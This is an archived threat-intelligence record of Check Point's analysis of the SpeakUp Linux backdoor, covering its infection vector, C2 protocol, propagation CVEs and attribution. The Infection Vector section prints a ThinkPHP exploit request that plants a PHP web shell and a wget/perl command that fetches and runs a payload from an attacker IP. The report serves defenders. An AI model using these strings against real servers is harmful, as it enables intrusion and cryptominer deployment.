{
	"id": "59c5f69e-c2f2-4dee-a175-071788bce393",
	"created_at": "2026-04-16T02:22:14.438509Z",
	"updated_at": "2026-04-18T02:22:13.728876Z",
	"deleted_at": null,
	"sha1_hash": "b793e22a8560bec69387ca43b9925a1ba6251bd7",
	"title": "SpeakUp: A New Undetected Backdoor Linux Trojan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 97783,
	"plain_text": "SpeakUp: A New Undetected Backdoor Linux Trojan\r\nBy deugenio\r\nPublished: 2019-02-04 · Archived: 2026-04-16 02:01:43 UTC\r\nCheck Point Research has discovered a new campaign exploiting Linux servers to implant a new Backdoor Trojan.\r\nDubbed ‘SpeakUp’, the new Trojan exploits known vulnerabilities in six different Linux distributions.\r\nThe attack targets servers worldwide, including AWS hosted machines.\r\nCheck Point researchers have spotted a new campaign exploiting Linux servers to implant a new Backdoor which evades all security vendors. The new Trojan, named “SpeakUp” after one of its command and control names, exploits known vulnerabilities in six different Linux distributions. The attack is gaining momentum and targeting servers in East Asia and Latin America, including AWS hosted machines.\r\nSpeakUp propagates internally within the infected subnet, and beyond it to new IP ranges, by exploiting remote code execution vulnerabilities. In addition, SpeakUp has shown the ability to infect Mac devices with the undetected backdoor.\r\nWhile the exact identity of the threat actor behind this new attack is still unconfirmed, Check Point researchers were able to correlate SpeakUp’s author with a malware developer known as Zettabit. Although SpeakUp is implemented differently, it has a lot in common with Zettabit’s craftsmanship.\r\nFigure 1: SpeakUp’s Victim Distribution\r\nhttps://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/\r\nPage 1 of 11\n\nFigure 2: SpeakUp’s propagation rate per day\r\nInfection Vector\r\nThe initial infection vector targets the recently reported vulnerability in ThinkPHP and uses command injection techniques to upload a PHP shell that serves and executes a Perl backdoor.\r\nThe exploitation is issued in three steps:\r\n1. Exploiting CVE-2018-20062 to upload a PHP shell\r\nUsing a GET request, a remote command execution exploit for ThinkPHP (CVE-2018-20062) is sent to the targeted server, as shown below:\r\ns=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=system\u0026vars[1][]=echo ^\u003c? php $action = $_GET[‘module’];system($action);? ^\u003e\u003eindex.php\r\nThis shell executes commands sent via the “module” parameter of the query string.\r\n2. Serving the backdoor\r\nAnother HTTP request is sent to the targeted server, with the following resource:\r\n/?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc\r\nThe above standard injection pulls the ibus payload and stores it at /tmp/e3ac24a0bcddfacd010a6c10f4a814bc\r\n3. Launching the backdoor\r\nThe execution is issued using an additional HTTP request:\r\n/?module=perl /tmp/e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/e3ac24a0bcddfacd010a6c10f4a814bc\r\nThis executes the Perl script, sleeps for two seconds and deletes the file to remove any evidence.\r\nBackdoor\r\nThe sample we analyzed was observed targeting a machine in China on January 14, 2019 and was first submitted to VirusTotal on January 9, 2019. At the time of writing this article, it has no detections in VT.\r\nFigure 3: no detections for SpeakUp in VirusTotal\r\nIn an attempt to hinder investigation by security researchers, the second stage payload was encoded with salted base64. To our dismay, the C\u0026C communication was also encoded with the same combination.\r\nThe decoded data contains multiple C\u0026C domains, IP addresses and other unique parameters, along with second-stage payloads and additional modules.\r\nIn the analysis below we go through the malicious code and reveal the different functions and modules the Trojan runs on the victim’s machine.\r\nVictim Registration\r\nSpeakUp uses POST and GET requests over HTTP to communicate with its main C\u0026C, which is the compromised website speakupomaha[.]com.\r\nThe first POST packet sends a victim ID and introductory information such as the current version of the installed script (currently 1.0.4).\r\nThe first C\u0026C response is “needrgr”, which means the infected victim is new to the server and needs to register.\r\nAfterwards, the Trojan posts “full information” about the machine by executing the following Linux commands:\r\nuname (-r, -v, -m, -n, -a, -s)\r\nwhoami\r\nifconfig -a\r\narp -a\r\ncat /proc/cpuinfo | grep -c “cpu family” 2\u003e\u00261\r\nwho -b\r\nFigure 4: The registration process and introductory commands\r\nSpeakUp’s Main Functions\r\nAfter the registration process is completed, SpeakUp continuously polls its C\u0026C for new tasks on a fixed “knock” interval.\r\nThe C\u0026C can issue the following command types:\r\n“newtask” - Execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, and send updated fingerprint data.\r\n“notask” - Sleep for 3 seconds and ask for another command.\r\n“newerconfig” - Update the downloaded miner configuration file.\r\nSpeakUp’s persistence is ensured using cron, and an internal mutex ensures only one instance remains alive at all times.\r\nPost-Infection Traffic\r\nOnce the victim is registered successfully, the C\u0026C begins sending new tasks. Most of them make the machine download and execute different files.\r\nAn interesting point to mention is the User-Agents in use. SpeakUp defines three User-Agents that the infected machine must use in every communication with its C\u0026C. Two of them are MacOS X User-Agents and the third is a hashed string:\r\nMozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/BADDAD\r\nMozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405\r\nE9BC3BD76216AFA560BFB5ACAF5731A3\r\nFigure 5: SpeakUp’s requests are encrypted with the salted base64 and include the unique User-Agent\r\nAt the moment SpeakUp serves XMRig miners to its listening infected servers. According to XMRHunter the wallets hold a total of ~107 Monero coins.\r\nFigure 6: SpeakUp receives additional commands to execute, this time in plain text.\r\nPropagation\r\nSpeakUp also equips its backdoors with i (sic), a Python script which allows the backdoor to scan and infect more Linux servers within its internal and external subnets. Its main functions are:\r\n1. Brute-force using a pre-defined list of usernames and passwords in an attempt to log in to admin panels.\r\n2. Scan the network environment of the infected machine; check for availability of specific ports on servers that share the same internal and external subnet mask (i.e. 255.255.0.0, a /16).\r\n3. Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers:\r\na) CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities\r\nb) CVE-2010-1871: JBoss Seam Framework remote code execution\r\nc) JBoss AS 3/4/5/6: Remote Command Execution (exploit)\r\nd) CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE\r\ne) CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.\r\nf) Hadoop YARN ResourceManager – Command Execution (exploit)\r\ng) CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.\r\nA successful exploitation of one of the vulnerabilities results in deploying the original ibus script on the exploited server.\r\nAttacker Identity and Leads\r\nIbus client for Unix OS\r\nInside the ibus script, we can see a short description of an IBus client for GNU Emacs. IBus is an open-source multilingual input framework for Linux and Unix OS. While it supports all languages that do not use Latin letters, it seems that the main audience is Asian users. The description and the file name are the only elements that link SpeakUp to the IBus framework; the content has no similarities whatsoever.\r\nThis may imply a connection between SpeakUp and East Asia.\r\nUnique User-Agents\r\nThe unique User-Agents used in the HTTP communication between SpeakUp and the C\u0026C are a possible path to the identity of the threat actor behind this campaign.\r\nThe unique strings mainly consist of “Mobile/BADDAD”, “Mobile/7B405” and “E9BC3BD76216AFA560BFB5ACAF5731A3”.\r\nInterestingly enough, the last string turned out to be the MD5 hash of the word liteHTTP.\r\nGoogling liteHTTP leads to the liteHTTP GitHub project.\r\nWhile liteHTTP is a C# based bot which targets Windows clients, its modules are somewhat similar to those of the SpeakUp Trojan:\r\nDownload \u0026 execute\r\nStartup (with persistence)\r\nCollection of system information (OS, version, installed location, etc.)\r\nSelf-update\r\nUninstall\r\nThis project was created by a user called zettabithf, who is linked to a user with the same name on Hack Forums.\r\nFigure 7: Zettabit’s user description on Hack Forums\r\nThe Hack Forums profile may imply the author of the SpeakUp backdoor is Russian speaking, as many of the comments are written in this language. He also seems to be a botnet developer, providing recommendations and publishing his LiteHTTP bot, which seems to have a well-designed GUI.\r\nAnother interesting thing to note is the use of the acronym “Knock” on several occasions in his posts. “Knock” also appears in several strings inside the code of SpeakUp.\r\nFigures 8 and 9: LiteHTTP screenshots taken from the user’s profile in which the acronym “Knock” appears\r\nConclusion\r\nSpeakUp’s obfuscated payloads and propagation technique are beyond any doubt the work of a bigger threat in the making. It is hard to imagine anyone would build such a compound array of payloads just to deploy a few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware. This campaign, while still relatively new, can evolve into something bigger and potentially more harmful.\r\nIndeed, the threat actor behind this campaign, ‘Zettabithf’ himself, provides some ‘words of wisdom’ in this respect:\r\nCloudGuard IaaS is an advanced threat prevention technology that protects your cloud infrastructure against threats, including new Trojans like ‘SpeakUp’.\r\nThe Check Point IPS blade provides protections against these threats:\r\nCommand Injection Over HTTP\r\nNoneCMS ThinkPHP Remote Code Execution (CVE-2018-20062)\r\nOracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271)\r\nOracle WebLogic WLS Server Component Arbitrary File Upload (CVE-2018-2894)\r\nHadoop YARN ResourceManager Remote Command Execution\r\nApache ActiveMQ Fileserver Multi Methods Directory Traversal (CVE-2016-3088)\r\nJBoss Seam 2 Framework Remote Code Execution (CVE-2010-1871)\r\nJBoss Enterprise Application Platform Invoker Servlets Remote Code Execution (CVE-2012-0874)\r\nRed Hat JBoss AS Remote Code Execution\r\nSuspicious Linux Shell Downloader\r\nThe Check Point Anti-Bot blade provides protection against this threat:\r\nLinux.SpeakUp\r\nIOCs\r\nMD5 hashes of the SpeakUp scripts and XMRig miners, C\u0026C addresses and Monero wallets: listed in the source report.\r\nSource: https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/"
	],
	"report_names": [
		"speakup-a-new-undetected-backdoor-linux-trojan"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-18T02:00:05.371962Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1776306134,
	"ts_updated_at": 1776478933,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b793e22a8560bec69387ca43b9925a1ba6251bd7.pdf",
		"text": "https://archive.orkl.eu/b793e22a8560bec69387ca43b9925a1ba6251bd7.txt",
		"img": "https://archive.orkl.eu/b793e22a8560bec69387ca43b9925a1ba6251bd7.jpg"
	}
}